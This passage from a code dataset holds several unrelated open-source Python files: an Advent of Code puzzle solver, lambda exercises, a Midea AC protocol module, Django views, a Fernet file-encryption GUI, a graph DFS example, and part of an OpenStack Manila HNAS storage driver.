\"//\" + s2\n        elif self.ope == \"eql\":\n            return s1 + \"==\" + s2\n        elif self.ope == \"mod\":\n            return \"(\" + s1 + \")%\" + s2\n\n    def contains_multiply(self):\n        print(self.to_string())\n        if self.ope == \"val\":\n            return False\n        if self.ope == \"mul\":\n            return True\n        if self.ope == \"add\":\n            return self.first.contains_multiply() or self.second.contains_multiply()\n        print(\"contains_multiply: unhandled operation\", self.to_string())\n\n    def simplify(self):\n        if self.ope == \"mul\":\n            if self.second.ope == \"val\":\n                if self.second.first == 0:\n                    return SpotValue(\"val\", 0, \"\")\n                elif self.second.first == 1:\n                    return self.first\n            if self.first.ope == \"val\":\n                if self.first.first == 0:\n                    return SpotValue(\"val\", 0, \"\")\n                elif self.first.first == 1:\n                    return self.second\n        elif self.ope == \"add\":\n            if self.first.ope == \"val\" and self.first.first == 0:\n                return self.second\n            if self.second.ope == \"val\" and self.second.first == 0:\n                return self.first\n            if self.first.ope == \"val\" and self.second.ope == \"val\" and not isinstance(self.first.first,\n                                                                                       str) and not isinstance(\n                self.second.first, str):\n                return 
SpotValue(\"val\", self.first.first + self.second.first, \"\")\n elif self.ope == \"mod\" and self.second.ope == \"val\" and not isinstance(self.second.first, str):\n modulo = self.second.first\n # if self.first.ope == \"mul\" and self.first.second.ope == \"val\" and self.first.second.first == modulo:\n # return SpotValue(\"val\", 0, \"\")\n if self.first.contains_multiply():\n self.first = self.first.recursive_mod(modulo).simplify()\n if not self.first.contains_multiply():\n range_start, range_end = self.first.range()\n if range_end < modulo and 0 <= range_start:\n return self.first\n elif range_start == range_end:\n return SpotValue(\"val\", range_end % modulo, \"\")\n elif self.ope == \"div\":\n if self.second.ope == \"val\" and self.second.first == 1:\n return self.first\n elif self.ope == \"eql\":\n range1_start, range1_end = self.first.range()\n range2_start, range2_end = self.second.range()\n if range1_end < range2_start or range2_end < range1_start:\n return SpotValue(\"val\", 0, \"\")\n elif range1_start == range1_end and range1_end == range2_start and range2_start == range2_end:\n return SpotValue(\"val\", 1, \"\")\n return self\n\n def range(self):\n if self.ope == \"val\":\n if isinstance(self.first, str):\n return 1, 9\n else:\n return self.first, self.first\n elif self.ope == \"add\":\n range1_start, range1_end = self.first.range()\n range2_start, range2_end = self.second.range()\n return range1_start + range2_start, range1_end + range2_end\n print(\"no range\", self.to_string())\n\n def recursive_mod(self, modulo):\n if self.ope == \"add\":\n self.first = self.first.recursive_mod(modulo)\n self.second = self.second.recursive_mod(modulo)\n elif self.ope == \"mul\" and self.second.ope == \"val\" and self.second.first == modulo:\n return SpotValue(\"val\", 0, \"\")\n item = self.simplify()\n return item\n\n def copy(self):\n if self.ope == \"val\":\n return SpotValue(\"val\", self.first, self.second)\n else:\n return SpotValue(self.ope, self.first.copy(), self.second.copy())\n\n\ndef do_operations_on(w, x, y, z, blocks, failed_attempts):\n if len(blocks) == 0:\n if z == 0:\n return \"\"\n else:\n return \"-1\"\n key = (w, x, y, z)\n if key in failed_attempts[len(blocks) - 1]:\n return \"-1\"\n failed_attempts[len(blocks) - 1].add(key)\n block = blocks[0]\n memory = [w, x, y, z]\n for operation, values in block:\n pos = convert_to_mem(values[0])\n second = get_value_on(values[1], memory)\n\n if operation == \"add\":\n memory[pos] += second\n elif operation == \"mul\":\n memory[pos] *= second\n elif operation == \"div\":\n memory[pos] = memory[pos] // second\n elif operation == \"mod\":\n memory[pos] = memory[pos] % second\n elif operation == \"eql\":\n if second == memory[pos]:\n memory[pos] = 1\n else:\n memory[pos] = 0\n else:\n print(\"not working\")\n result = \"-1\"\n for w2 in range(1, 10):\n # result = do_operations_on(w2, memory[1], memory[2], memory[3], blocks[1:], failed_attempts)\n result = do_operations_on(w2, 0, 0, memory[3], blocks[1:], failed_attempts)\n if len(blocks) > 11:\n print(len(blocks), len(failed_attempts[13]), len(failed_attempts[12]), len(failed_attempts[11]),\n len(failed_attempts[0]))\n if result != \"-1\":\n print(\"succes\")\n return str(w) + result\n return result\n\n\ndef get_value(char, memory):\n if char in [\"w\", \"x\", \"y\", \"z\"]:\n return memory[convert_to_mem(char)].copy()\n return SpotValue(\"val\", int(char), \"\")\n\n\ndef get_value_on(char, memory):\n if char in [\"w\", \"x\", \"y\", \"z\"]:\n return memory[convert_to_mem(char)]\n 
return int(char)\n\n\ndef convert_to_mem(char):\n    if char == \"w\":\n        return 0\n    if char == \"x\":\n        return 1\n    if char == \"y\":\n        return 2\n    if char == \"z\":\n        return 3\n\n\ndef part2(data):\n    \"\"\"Solve part 2\"\"\"\n\n\ndef solve(path):\n    \"\"\"Solve the puzzle for the given input\"\"\"\n\n    puzzle_input = pathlib.Path(path).read_text().strip()\n    data = parse(puzzle_input)\n    start_1 = time.time()\n    solution1 = part1(data)\n    end_1 = time.time()\n    print(\"time part 1:\", end_1 - start_1)\n\n    puzzle_input = pathlib.Path(path).read_text().strip()\n    data = parse(puzzle_input)\n    start_2 = time.time()\n    solution2 = part2(data)\n    end_2 = time.time()\n    print(\"time part 2:\", end_2 - start_2)\n\n    return solution1, solution2\n\n\nif __name__ == \"__main__\":\n    for path in sys.argv[1:]:\n        print(f\"{path}:\")\n        solutions = solve(path)\n        print(\"\\n\".join(str(solution) for solution in solutions))\n","repo_name":"Artuur-Oerlemans/adventOfCode2021","sub_path":"src/day24/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"39727181961","text":"x = lambda a:a*a\nprint(x(2))\n\ndef anew(x):\n    return(lambda y:x+y)\np = anew(4)\nprint(p(8))\n## filter () ..\n\na = [1,2,3,4,6,8,10]\na_new = list(filter(lambda a:(a%2==0),a))\nprint(a_new)\n\n## map()\n\nb = [2,3,4,5,6,7,8,9]\nb_new = list(map(lambda b:(b%3==0),b))\nprint(b_new)\n##Reduce(function,sequence)\nfrom functools import reduce\nc_new = reduce(lambda a,b:a+b,[1,2,3,4,5])\nprint(c_new)\n\nd = lambda a,b:(a**2+2*a*b+b**2)\nprint(d(2,3))\n\n# Higher order function\nh_sam = lambda x,a_new:x+a_new(x)\n\nprint(h_sam(2,lambda x:x*2))\n\nfrom functools import reduce\nprint((lambda *args:sum(args))(1,2,3,4))\nlst = [2,3,4,5]\nx = map(lambda x:x+1,filter(lambda x:x>=3,lst))\nprint(list(x))\ny = reduce(lambda a,b:a+b,filter(lambda x:(x>=3),lst))  # reduce needs a two-argument function\nprint(y)","repo_name":"Vimala390/Vimala_py","sub_path":"sam_lambda.py","file_name":"sam_lambda.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"33670859394","text":"from ...core.message import (\n    MessageType,\n    MessageRequest,\n    MessageResponse,\n    MessageBody,\n)\n\n\nclass MessageCDBase(MessageRequest):\n    def __init__(self, protocol_version, message_type, body_type):\n        super().__init__(\n            device_type=0xCD,\n            protocol_version=protocol_version,\n            message_type=message_type,\n            body_type=body_type\n        )\n\n    @property\n    def _body(self):\n        raise NotImplementedError\n\n\nclass MessageQuery(MessageCDBase):\n    def __init__(self, protocol_version):\n        super().__init__(\n            protocol_version=protocol_version,\n            message_type=MessageType.query,\n            body_type=0x01)\n\n    @property\n    def _body(self):\n        return bytearray([0x01])\n\n\nclass MessageSet(MessageCDBase):\n    def __init__(self, protocol_version):\n        super().__init__(\n            protocol_version=protocol_version,\n            message_type=MessageType.set,\n            body_type=0x01)\n        self.power = False\n        self.target_temperature = 0\n        self.aux_heating = False\n        self.fields = {}\n        self.mode = 1\n\n    def read_field(self, field):\n        value = self.fields.get(field, 0)\n        return value if value else 0\n\n    @property\n    def _body(self):\n        power = 0x01 if self.power else 0x00\n        mode = self.mode + 1\n        target_temperature = round(self.target_temperature * 2 + 30)\n        return bytearray([\n            0x01, power, mode, target_temperature,\n            self.read_field(\"trValue\"),\n            self.read_field(\"openPTC\"),\n            
self.read_field(\"ptcTemp\"),\n 0 # self.read_field(\"byte8\")\n ])\n\n\nclass CDGeneralMessageBody(MessageBody):\n def __init__(self, body):\n super().__init__(body)\n self.power = (body[2] & 0x01) > 0\n self.target_temperature = round((body[3] - 30) / 2)\n if (body[2] & 0x02) > 0:\n self.mode = 0\n elif (body[2] & 0x04) > 0:\n self.mode = 1\n elif (body[2] & 0x08) > 0:\n self.mode = 2\n self.current_temperature = round((body[4] - 30) / 2)\n self.condenser_temperature = (body[7] - 30) / 2\n self.outdoor_temperature = (body[8] - 30) / 2\n self.compressor_temperature = (body[9] - 30) / 2\n self.max_temperature = round((body[10] - 30) / 2)\n self.min_temperature = round((body[11] - 30) / 2)\n self.compressor_status = (body[27] & 0x08) > 0\n if (body[28] & 0x20) > 0:\n self.mode = 3\n\nclass CD02MessageBody(MessageBody):\n def __init__(self, body):\n super().__init__(body)\n self.fields = {}\n self.power = (body[2] & 0x01) > 0\n self.mode = body[3]\n self.target_temperature = round((body[4] - 30) / 2)\n self.fields[\"trValue\"] = body[5]\n self.fields[\"openPTC\"] = body[5]\n self.fields[\"ptcTemp\"] = body[7]\n self.fields[\"byte8\"] = body[8]\n\n\nclass MessageCDResponse(MessageResponse):\n def __init__(self, message):\n super().__init__(message)\n if self.message_type in [MessageType.query, MessageType.notify2]:\n self.set_body(CDGeneralMessageBody(super().body))\n elif self.message_type == MessageType.set and self.body_type == 0x01:\n self.set_body(CD02MessageBody(super().body))\n self.set_attr()\n","repo_name":"georgezhao2010/midea_ac_lan","sub_path":"custom_components/midea_ac_lan/midea/devices/cd/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":836,"dataset":"github-code","pt":"18"} +{"seq_id":"28829265584","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate\n\nfrom django.views import generic\nfrom django.urls import reverse_lazy\n\nfrom .forms import CustomUserCreationForm\nfrom thehub import models as hubModels\n\n\n# Create your views here.\n\n# Sign up view, using built-in class based view so it is easier to maintain and deploy\n# Read more here: https://docs.djangoproject.com/en/2.0/topics/class-based-views/intro/\nclass SignUp(generic.CreateView):\n form_class = CustomUserCreationForm\n success_url = reverse_lazy(\"login\")\n template_name = \"userprofile/signup.html\"\n\n def get(self, request):\n # Customize the get method, the post method is handled for us by built-in function\n\n if request.user.is_authenticated:\n # Redirect user to the profile page if they already login and try to sign up\n return redirect(\"profile\")\n else:\n form = self.form_class()\n return render(request, self.template_name, {\"form\": form})\n\n\n@login_required(login_url=\"login\", redirect_field_name=\"profile\")\ndef profile(request):\n user = request.user\n projects = hubModels.Project.objects.get_project_of_user(user.username)\n subscriptions = hubModels.Project.objects.get_project_subscribed_by(user.username)\n\n # Get all post that the user should be involded or interested in (project member)\n # THIS INCLUDES PROJECTS IN SUBSCRIPTIONS AS WELL\n posts = hubModels.Post.objects.get_parent_posts_user_interested(user.username)\n children_posts = {}\n\n if posts:\n posts = posts.order_by(\"-id\")\n # Get all children of relevant post\n for post in posts:\n post_id = 
post.pk\n            # Let children posts be ordered oldest first, so the conversation reads in order\n            children_posts[post_id] = hubModels.Post.objects.get_chilren_of_post(post_id)\n\n    owned_projects = hubModels.Project.objects.get_project_owned_by(user.username)\n    pending_requests = None\n    for project in owned_projects:\n        if pending_requests is None:\n            pending_requests = hubModels.MemberRequest.objects.get_requests_for_project(project)\n        else:\n            pending_requests = pending_requests | hubModels.MemberRequest.objects.get_requests_for_project(project)\n\n    return render(request, 'userprofile/profile.html', {\"projects\":projects,\n                                                        \"subscriptions\": subscriptions,\n                                                        \"posts\": posts,\n                                                        \"children_posts\": children_posts,\n                                                        \"pending_requests\": pending_requests})\n","repo_name":"amandadoan/Idea-Hub","sub_path":"IdeaHub/userprofile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11006009011","text":"import PySide2\nimport sys\nfrom PySide2.QtWidgets import QPushButton, QLineEdit, QApplication, QVBoxLayout, QGridLayout, QWidget, QFileDialog\nfrom PySide2.QtGui import QFont\nfrom PySide2.QtCore import Qt\nfrom cryptography.fernet import Fernet\nimport os\nWIDGET_HEIGHT = 40\n\n\nclass Window(QWidget):\n    def __init__(self, parent=None):\n        super().__init__(parent)\n        self.setFont(QFont(\"Berlin Sans FB\", 10))\n        self.setWindowTitle(\"File ENC\")\n        self.setFixedSize(500, 220)\n\n        self.btn_src = QPushButton(\"browse\")\n        self.btn_dst = QPushButton(\"browse\")\n        self.btn_enc = QPushButton(\"Encrypt\")\n        self.btn_dec = QPushButton(\"Decrypt\")\n        self.btn_src.setFixedSize(60, WIDGET_HEIGHT)\n        self.btn_dst.setFixedSize(60, WIDGET_HEIGHT)\n        self.btn_src.clicked.connect(self.open_file_dialog)\n        self.btn_dst.clicked.connect(self.open_dir_dialog)\n        self.btn_enc.clicked.connect(self.encrypt_file)\n        self.btn_dec.clicked.connect(self.decrypt_file)\n\n        self.LE_file_path = QLineEdit()\n        self.LE_file_path.setPlaceholderText(\"Source File Path...\")\n        self.LE_file_path.setFixedHeight(WIDGET_HEIGHT)\n        self.LE_file_path.setReadOnly(True)\n\n        self.LE_dir_path = QLineEdit()\n        self.LE_dir_path.setPlaceholderText(\"Destination Path...\")\n        self.LE_dir_path.setFixedHeight(WIDGET_HEIGHT)\n        self.LE_dir_path.setReadOnly(True)\n\n        self.LE_key = QLineEdit()\n        self.LE_key.setPlaceholderText(\"Enter the Cipher Key...\")\n        self.LE_key.setFixedHeight(WIDGET_HEIGHT)\n\n        layout = QGridLayout()\n        layout.setRowMinimumHeight(0, 30)\n        layout.addWidget(self.btn_src, 0, 1)\n        layout.addWidget(self.btn_dst, 1, 1)\n        layout.addWidget(self.btn_enc, 3, 0, 1, 2, alignment=Qt.AlignHCenter)\n        layout.addWidget(self.btn_dec, 4, 0, 1, 2, alignment=Qt.AlignHCenter)\n        layout.addWidget(self.LE_file_path, 0, 0)\n        layout.addWidget(self.LE_dir_path, 1, 0)\n        layout.addWidget(self.LE_key, 2, 0, 1, 2)\n        layout.setHorizontalSpacing(10)\n        layout.setHorizontalSpacing(0)\n        print(layout.rowStretch(0))\n        self.setLayout(layout)\n        self.show()\n\n    def open_file_dialog(self):\n        fname = QFileDialog.getOpenFileName(self, \"Select File\")\n        self.LE_file_path.setText(fname[0])\n\n    def open_dir_dialog(self):\n        file = QFileDialog.getExistingDirectory(self, \"Select Directory\")\n        self.LE_dir_path.setText(file)\n\n    def encrypt_file(self):\n        cipher = Fernet(self.LE_key.text())\n        with open(self.LE_file_path.text(), 'rb') as f:\n            data = f.read()\n        with open(f\"{self.LE_dir_path.text()}\\\\enc_{os.path.basename(self.LE_file_path.text())}\", 'wb') as 
f:\n f.write(cipher.encrypt(data))\n\n def decrypt_file(self):\n cipher = Fernet(self.LE_key.text())\n with open(self.LE_file_path.text(), 'rb') as f:\n data = f.read()\n with open(f\"{self.LE_dir_path.text()}\\\\dec_{os.path.basename(self.LE_file_path.text())}\", 'wb') as f:\n f.write(cipher.decrypt(data))\n\n\nif __name__ == \"__main__\":\n app = QApplication()\n window = Window()\n sys.exit(app.exec_())\n","repo_name":"Rasco101/RepoTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29007462019","text":"#using recursion\nfrom collections import defaultdict\nclass Graph:\n def __init__(self, n):\n self.n= n\n self.graph= defaultdict(list)\n\n def addedge(self, v1, v2):\n self.graph[v1].append(v2)\n def dfsutil(self, s, visited):\n visited.add(s)\n print(s)\n for i in self.graph[s]:\n if i not in visited:\n self.dfsutil(i, visited)\n def dfs(self, s):\n visited= set()\n self.dfsutil(s, visited)\n \ng= Graph(6)\ng.addedge(0,1)\ng.addedge(0,3)\ng.addedge(3,4)\ng.addedge(3,5)\ng.addedge(1,2)\nprint(g.graph)\ng.dfs(0)\n","repo_name":"dstreta47/GraphsPractice","sub_path":"dfs_bfs.py","file_name":"dfs_bfs.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7592382774","text":"from oslo_concurrency import processutils\nfrom oslo_log import log\nfrom oslo_utils import units\nimport paramiko\nimport six\n\nimport time\n\nfrom manila import exception\nfrom manila.i18n import _\nfrom manila.i18n import _LE\nfrom manila.i18n import _LW\nfrom manila import utils as mutils\n\nLOG = log.getLogger(__name__)\n\n\nclass HNASSSHBackend(object):\n def __init__(self, hnas_ip, hnas_username, hnas_password, ssh_private_key,\n cluster_admin_ip0, evs_id, evs_ip, fs_name, job_timeout):\n self.ip = hnas_ip\n self.port = 22\n self.user = hnas_username\n self.password = hnas_password\n self.priv_key = ssh_private_key\n self.admin_ip0 = cluster_admin_ip0\n self.evs_id = six.text_type(evs_id)\n self.fs_name = fs_name\n self.evs_ip = evs_ip\n self.sshpool = None\n self.job_timeout = job_timeout\n\n def get_stats(self):\n \"\"\"Get the stats from file-system.\n\n :returns:\n fs_capacity.size = Total size from filesystem.\n available_space = Free space currently on filesystem.\n \"\"\"\n command = ['df', '-a', '-f', self.fs_name]\n output, err = self._execute(command)\n\n line = output.split('\\n')\n fs_capacity = Capacity(line[3])\n\n available_space = fs_capacity.size - fs_capacity.used\n\n LOG.debug(\"Total space in file system: %(total)s GB.\",\n {'total': fs_capacity.size})\n LOG.debug(\"Used space in the file system: %(used)s GB.\",\n {'used': fs_capacity.used})\n LOG.debug(\"Available space in the file system: %(space)s GB.\",\n {'space': available_space})\n\n return fs_capacity.size, available_space\n\n def allow_access(self, share_id, host, share_proto, permission='rw'):\n \"\"\"Allow access to the share.\n\n :param share_id: ID of share that access will be allowed.\n :param host: Host to which access will be allowed.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :param permission: permission (e.g. 
'rw', 'ro') that will be allowed.\n \"\"\"\n # check if the share exists\n self.ensure_share(share_id, share_proto)\n export = self._nfs_export_list(share_id)\n\n # get the list that contains all the hosts allowed on the share\n host_list = export[0].export_configuration\n\n if permission in ('ro', 'rw'):\n host_access = host + '(' + permission + ')'\n else:\n msg = (_(\"Permission should be 'ro' or 'rw' instead \"\n \"of %s\") % permission)\n raise exception.HNASBackendException(msg=msg)\n\n # check if the host(s) is already allowed\n if any(host in x for x in host_list):\n if host_access in host_list:\n LOG.debug(\"Host: %(host)s is already allowed.\",\n {'host': host})\n else:\n # remove all the hosts with different permissions\n host_list = [\n x for x in host_list if not x.startswith(host)]\n # add the host with new permission\n host_list.append(host_access)\n self._update_access_rule(share_id, host_list)\n else:\n host_list.append(host_access)\n self._update_access_rule(share_id, host_list)\n\n def deny_access(self, share_id, host, share_proto, permission):\n \"\"\"Deny access to the share.\n\n :param share_id: ID of share that access will be denied.\n :param host: Host to which access will be denied.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :param permission: permission (e.g. 'rw', 'ro') that will be denied.\n \"\"\"\n # check if the share exists\n self.ensure_share(share_id, share_proto)\n export = self._nfs_export_list(share_id)\n\n # get the list that contains all the hosts allowed on the share\n host_list = export[0].export_configuration\n\n if permission in ('ro', 'rw'):\n host_access = host + '(' + permission + ')'\n else:\n msg = (_(\"Permission should be 'ro' or 'rw' instead \"\n \"of %s\") % permission)\n raise exception.HNASBackendException(msg=msg)\n\n # check if the host(s) is already not allowed\n if host_access not in host_list:\n LOG.debug(\"Host: %(host)s is already not allowed.\",\n {'host': host})\n else:\n # remove the host on host_list\n host_list.remove(host_access)\n self._update_access_rule(share_id, host_list)\n\n def delete_share(self, share_id, share_proto):\n \"\"\"Deletes share.\n\n It uses tree-delete-job-submit to format and delete virtual-volumes.\n Quota is deleted with virtual-volume.\n :param share_id: ID of share that will be deleted.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n \"\"\"\n try:\n self.ensure_share(share_id, share_proto)\n except exception.HNASBackendException as e:\n LOG.warning(_LW(\"Share %s does not exist on backend anymore.\"),\n share_id)\n LOG.exception(six.text_type(e))\n\n self._nfs_export_del(share_id)\n self._vvol_delete(share_id)\n\n LOG.debug(\"Export and share successfully deleted: %(shr)s on Manila.\",\n {'shr': share_id})\n\n def ensure_share(self, share_id, share_proto):\n \"\"\"Ensure that share is exported.\n\n :param share_id: ID of share that will be checked.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :returns: Returns a path of /shares/share_id if the export is ok.\n \"\"\"\n path = '/shares/' + share_id\n\n if not self._check_fs_mounted(self.fs_name):\n self._mount(self.fs_name)\n LOG.debug(\"Filesystem %(fs)s is unmounted. 
Mounting...\",\n {'fs': self.fs_name})\n self._check_vvol(share_id)\n self._check_quota(share_id)\n self._check_export(share_id)\n return path\n\n def create_share(self, share_id, share_size, share_proto):\n \"\"\"Creates share.\n\n Creates a virtual-volume, adds a quota limit and exports it.\n :param share_id: ID of share that will be created.\n :param share_size: Size limit of share.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n :returns: Returns a path of /shares/share_id if the export was\n created successfully.\n \"\"\"\n path = '/shares/' + share_id\n self._vvol_create(share_id, share_size)\n LOG.debug(\"Share created with id %(shr)s, size %(size)sG.\",\n {'shr': share_id, 'size': share_size})\n try:\n # Create NFS export\n self._nfs_export_add(share_id)\n LOG.debug(\"NFS Export created to %(shr)s.\",\n {'shr': share_id})\n return path\n except processutils.ProcessExecutionError as e:\n self._vvol_delete(share_id)\n msg = six.text_type(e)\n LOG.exception(msg)\n raise e\n\n def extend_share(self, share_id, share_size, share_proto):\n \"\"\"Extends a share to new size.\n\n :param share_id: ID of share that will be extended.\n :param share_size: New size of share.\n :param share_proto: Storage protocol of share. Currently,\n only NFS storage protocol is supported.\n \"\"\"\n self.ensure_share(share_id, share_proto)\n\n total, available_space = self.get_stats()\n\n LOG.debug(\"Available space in filesystem: %(space)s.\",\n {'space': available_space})\n\n if share_size < available_space:\n self._extend_quota(share_id, share_size)\n else:\n msg = (_(\"Failed to extend share %s.\") % share_id)\n raise exception.HNASBackendException(msg=msg)\n\n def manage_existing(self, share_proto, share_id):\n \"\"\"Manages a share that exists on backend.\n\n :param share_proto: Storage protocol of share. 
Currently,\n only NFS storage protocol is supported.\n :param share_id: ID of share that will be managed.\n :returns: Returns a dict with size of share managed\n and its location (your path in file-system).\n \"\"\"\n self.ensure_share(share_id, share_proto)\n\n share_size = self._get_share_quota(share_id)\n if share_size is None:\n msg = (_(\"The share %s trying to be managed does not have a \"\n \"quota limit, please set it before manage.\") % share_id)\n raise exception.HNASBackendException(msg=msg)\n\n path = six.text_type(self.evs_ip) + ':/shares/' + share_id\n\n return {'size': share_size, 'export_locations': [path]}\n\n def create_snapshot(self, share_id, snapshot_id):\n \"\"\"Creates a snapshot of share.\n\n It copies the directory and all files to a new directory inside\n /snapshots/share_id/.\n :param share_id: ID of share for snapshot.\n :param snapshot_id: ID of new snapshot.\n \"\"\"\n\n export = self._nfs_export_list(share_id)\n saved_list = export[0].export_configuration\n new_list = []\n for access in saved_list:\n new_list.append(access.replace('(rw)', '(ro)'))\n self._update_access_rule(share_id, new_list)\n\n src_path = '/shares/' + share_id\n snap_path = '/snapshots/' + share_id + '/' + snapshot_id\n\n try:\n command = ['tree-clone-job-submit', '-e', '-f', self.fs_name,\n src_path, snap_path]\n\n output, err = self._execute(command)\n job_submit = JobSubmit(output)\n if job_submit.request_status == 'Request submitted successfully':\n job_id = job_submit.job_id\n\n job_status = None\n progress = ''\n job_rechecks = 0\n starttime = time.time()\n deadline = starttime + self.job_timeout\n while not job_status or \\\n job_status.job_state != \"Job was completed\":\n\n command = ['tree-clone-job-status', job_id]\n output, err = self._execute(command)\n job_status = JobStatus(output)\n\n if job_status.job_state == 'Job failed':\n break\n\n old_progress = progress\n progress = job_status.data_bytes_processed\n\n if old_progress == progress:\n job_rechecks += 1\n now = time.time()\n if now > deadline:\n command = ['tree-clone-job-abort', job_id]\n output, err = self._execute(command)\n LOG.error(_LE(\"Timeout in snapshot %s creation.\") %\n snapshot_id)\n msg = (_(\"Share snapshot %s was not created.\")\n % snapshot_id)\n raise exception.HNASBackendException(msg=msg)\n else:\n time.sleep(job_rechecks ** 2)\n else:\n job_rechecks = 0\n\n if (job_status.job_state, job_status.job_status,\n job_status.directories_missing,\n job_status.files_missing) == (\"Job was completed\",\n \"Success\", '0', '0'):\n\n LOG.debug(\"Snapshot %(snapshot_id)s from share \"\n \"%(share_id)s created successfully.\",\n {'snapshot_id': snapshot_id,\n 'share_id': share_id})\n else:\n LOG.error(_LE('Error in snapshot %s creation.'),\n snapshot_id)\n msg = (_('Share snapshot %s was not created.') %\n snapshot_id)\n raise exception.HNASBackendException(msg=msg)\n\n except processutils.ProcessExecutionError as e:\n if ('Cannot find any clonable files in the source directory' in\n e.stderr):\n\n LOG.warning(_LW(\"Source directory is empty, creating an empty \"\n \"snapshot.\"))\n self._locked_selectfs('create', snap_path)\n else:\n msg = six.text_type(e)\n LOG.exception(msg)\n raise exception.HNASBackendException(msg=msg)\n finally:\n self._update_access_rule(share_id, saved_list)\n\n def delete_snapshot(self, share_id, snapshot_id):\n \"\"\"Deletes snapshot.\n\n It receives the share_id only to mount the path for snapshot.\n :param share_id: ID of share that snapshot was created.\n :param snapshot_id: ID of 
snapshot.\n        \"\"\"\n        path = '/snapshots/' + share_id + '/' + snapshot_id\n        command = ['tree-delete-job-submit', '--confirm', '-f', self.fs_name,\n                   path]\n        try:\n            output, err = self._execute(command)\n            path = '/snapshots/' + share_id\n            if 'Request submitted successfully' in output:\n                self._locked_selectfs('delete', path)\n\n        except processutils.ProcessExecutionError as e:\n            if 'Source path: Cannot access' not in e.stderr:\n                msg = six.text_type(e)\n                LOG.exception(msg)\n                raise e\n\n    def create_share_from_snapshot(self, share, snapshot):\n        \"\"\"Creates a new share from snapshot.\n\n        It copies everything from the snapshot directory to a new vvol,\n        sets a quota limit for it and exports it.\n        :param share: a dict from new share.\n        :param snapshot: a dict from snapshot that will be copied to\n            new share.\n        :returns: Returns the path for new share.\n        \"\"\"\n        output = ''\n        dst_path = '/shares/' + share['id']\n        src_path = '/snapshots/' + snapshot['share_id'] + '/' + snapshot['id']\n\n        # Before copying everything to new vvol, we need to create it,\n        # because we can only transform an empty directory into a vvol.\n\n        self._vvol_create(share['id'], share['size'])\n\n        try:\n            # Copy the directory to new vvol\n            # Syntax: tree-clone-job-submit -f <file-system> <source-path> <destination-path>\n            LOG.debug(\"Started share create from: %(shr)s.\",\n                      {'shr': six.text_type(snapshot['share_id'])})\n            command = ['tree-clone-job-submit', '-f', self.fs_name,\n                       src_path, dst_path]\n            output, err = self._execute(command)\n        except processutils.ProcessExecutionError as e:\n            if ('Cannot find any clonable files in the source directory' in\n                    e.stderr):\n                LOG.warning(_LW(\"Source directory is empty, exporting \"\n                                \"directory.\"))\n                if self._nfs_export_add(share['id']):\n                    return dst_path\n\n        if 'Request submitted successfully' in output:\n            # Create NFS export\n            if self._nfs_export_add(share['id']):\n                # Return export path\n                return dst_path\n        else:\n            msg = (_(\"Share %s was not created.\") % share['id'])\n            raise exception.HNASBackendException(msg=msg)\n\n    @mutils.retry(exception=exception.HNASConnException, wait_random=True)\n    def _execute(self, commands):\n        command = ['ssc', '127.0.0.1']\n        if self.admin_ip0 is not None:\n            command = ['ssc', '--smuauth', self.admin_ip0]\n\n        command = command + ['console-context', '--evs', self.evs_id]\n        commands = command + commands\n\n        mutils.check_ssh_injection(commands)\n        commands = ' '.join(commands)\n\n        if not self.sshpool:\n            self.sshpool = mutils.SSHPool(ip=self.ip,\n                                          port=self.port,\n                                          conn_timeout=None,\n                                          login=self.user,\n                                          password=self.password,\n                                          privatekey=self.priv_key)\n        with self.sshpool.item() as ssh:\n            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n            try:\n                out, err = processutils.ssh_execute(ssh, commands,\n                                                    check_exit_code=True)\n                LOG.debug(\"Command %(cmd)s result: out = %(out)s - err = \"\n                          \"%(err)s.\", {'cmd': commands,\n                                       'out': out, 'err': err})\n                return out, err\n            except processutils.ProcessExecutionError as e:\n                if 'Failed to establish SSC connection' in e.stderr:\n                    LOG.debug(\"SSC connection error!\")\n                    msg = _(\"Failed to establish SSC connection.\")\n                    raise exception.HNASConnException(msg=msg)\n                else:\n                    LOG.debug(\"Command %(cmd)s result: out = %(out)s - err = \"\n                              \"%(err)s - exit = %(exit)s.\", {'cmd': e.cmd,\n                                                             'out': e.stdout,\n                                                             'err': e.stderr,\n                                                             'exit':\n                                                                 e.exit_code})\n                    LOG.error(_LE(\"Error running SSH command.\"))\n                    raise\n\n    def _check_fs_mounted(self, fs_name):\n        self._check_fs()\n        fs_list = self._get_filesystem_list()\n        for i in range(0, len(fs_list)):\n            if fs_list[i].name == fs_name and 
